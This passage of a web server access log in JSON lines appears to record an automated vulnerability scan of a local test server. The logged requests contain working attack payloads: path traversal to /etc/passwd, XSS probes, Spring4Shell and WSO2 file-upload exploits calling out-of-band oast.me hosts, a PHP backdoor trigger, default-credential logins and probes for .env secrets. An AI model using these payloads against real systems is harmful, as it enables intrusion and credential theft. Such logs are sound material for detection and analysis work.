"13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/node_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cu.html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"zerodiumvar_dump(233*233);", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/System/MailConnect/host/c9v8ia8smpv8c8qg07h0mnf5k8rsk1u3t.oast.me/port/80/secure/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.914","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json/v1.0/297MkxuOWC1Knqnijgn7sjYzjjl@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('297MksUA78Tc0pCvZ15P2WotwAJ')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('297MksUA78Tc0pCvZ15P2WotwAJ')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/database.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"{\x22client\x22:\x22wheel_async\x22,\x22fun\x22:\x22pillar_roots.write\x22,\x22data\x22:\x22testing\x22,\x22path\x22:\x22../../../../../../../tmp/testing\x22,\x22username\x22:\x221\x22,\x22password\x22:\x221\x22,\x22eauth\x22:\x22pam\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_page.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://c9v8ia8smpv8c8qg07h05tjrjxmr4mpzq.oast.me&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://c9v8ia8smpv8c8qg07h03feyxirrmfyii.oast.me&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/297ml0lf31zojvmm483d6eu6zs7.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/297ml0lf31zojvmm483d6eu6zs7.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B 